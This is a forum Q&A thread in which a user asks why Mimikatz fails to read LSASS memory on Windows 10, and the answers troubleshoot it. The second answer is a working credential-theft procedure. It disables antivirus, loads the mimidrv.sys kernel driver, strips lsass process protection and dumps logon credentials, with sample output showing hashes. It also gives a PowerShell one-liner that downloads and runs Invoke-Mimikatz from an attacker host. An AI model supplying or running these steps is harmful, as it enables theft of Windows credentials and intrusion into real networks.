# What can prevent Mimikatz from accessing LSA?

Tags: windows, mimikatz

I used to run Mimikatz in one of my computers. Then, I did something to block its action and I do not recall what it was. I am trying to revert it unsuccessfully.

```
  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # token::elevate
Token Id  : 0
User name :
SID name  : NT AUTHORITY\SYSTEM

792     {0;000003e7} 1 D 63431          NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Primary
 -> Impersonated !
 * Process Token : {0;00025b34} 1 F 4156027     COMP\U244        S-1-5-21-542114799-846785721-1465343628-1001    (14g,24p)       Primary
 * Thread Token  : {0;000003e7} 1 D 4625769     NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Impersonation (Delegation)

mimikatz # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)
```

I know about **RunAsPPL**, but I have removed it:

```
reg query “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA” /v RunAsPPL
ERROR: Invalid key name.
```

Maybe a HotFIX changed something, I am running:

```
OS Version:                10.0.19043 N/A Build 19043
```

What else could be breaking the necessary access?

Answer (score 0):

I've tried both Mimikatz latest and 2.1.1, both doesnt seem to work. Apparently, you need a cmd as NT AUTHORITY\SYSTEM via running cmd as Administrator then ".\PsExec64.exe -i -s cmd.exe", in the new spawned cmd, make sure a "whoami" returns NT AUTHORITY\SYSTEM.

Comment: `NT AUTHORITY\SYSTEM` and `administrator` are different things. And I already elevated, as you can see in my post

Comment: Hey, I meant, ensure that the cmd that runs Mimikatz is NT AUTHORITY\SYSTEM by running whoami before running mimikatz.

Comment: And what would it be difference from running as Administrator and elevate the token?

Comment: No idea, but can you give it a try, with NT AUTHORITY\SYSTEM - cmd instead of an Administrator cmd?

Comment: It worked in my case against a Windows Server 2016, when my cmd's whoami returns NT AUTHORITY\SYSTEM.

Comment: This is not the issue, I am `NT AUTHORITY\SYSTEM` as you can see

Comment: No. Get NT AUTHORITY\SYSTEM on CMD not via elevate. On the Windows 2016 Server on my end, even after elevating i faced the same error. But, when i ran  ".\PsExec64.exe -i -s cmd.exe", and get a cmd which returns NT AUTHORITY\SYSTEM via whoami, the error does not occur anymore. Could you, give it a go and see instead of arguing again and again?

Comment: OK, but just because you insist: `C:\WINDOWS\system32>whoami`
`nt authority\system`

`C:\WINDOWS\system32>...\x64\mimikatz.exe`
...
`mimikatz # privilege::debug`
`Privilege '20' OK`

`mimikatz # sekurlsa::logonpasswords`
`ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)`

Answer (score 0):

Turn off AV if you can and upload the `mimidrv.sys`. You can `locate` it on kali.

Then manually load the driver with the sc.exe Service Control application.

```
sc create mimidrv binPath= C:\inetpub\wwwroot\upload\mimidrv.sys type= kernel start= demand

sc start mimidrv
```

Now use mimikatz to bypass it if you have RDP connect.

```
mimikatz # !+
[*] 'mimidrv' service not present
[+] 'mimidrv' service successfully registered
[+] 'mimidrv' service ACL to everyone
[+] 'mimidrv' service started
 
mimikatz # !processprotect /process:lsass.exe /remove
Process : lsass.exe
PID 552 -> 00/00 [0-0-0]
 
mimikatz # privilege::debug
Privilege '20' OK
 
mimikatz # sekurlsa::logonpasswords
 
Authentication Id : 0 ; 41238 (00000000:0000a116)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 30/03/2022 09:15:07
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : DC$
         * Domain   : BORDERGATE
         * NTLM     :  .... *SNIP*
```

If you don't have RDP, try oneline method:

```
(New-Object System.Net.WebClient).DownloadString('http://attacker_ip/Invoke-Mimikatz.ps1') | IEX
Invoke-Mimikatz -Command "!+"
Invoke-Mimikatz -Command "`"!processprotect /process:lsass.exe /remove`""
Invoke-Mimikatz -Command "sekurlsa::logonpasswords"
```

- https://www.bordergate.co.uk/bypassing-lsa-protections/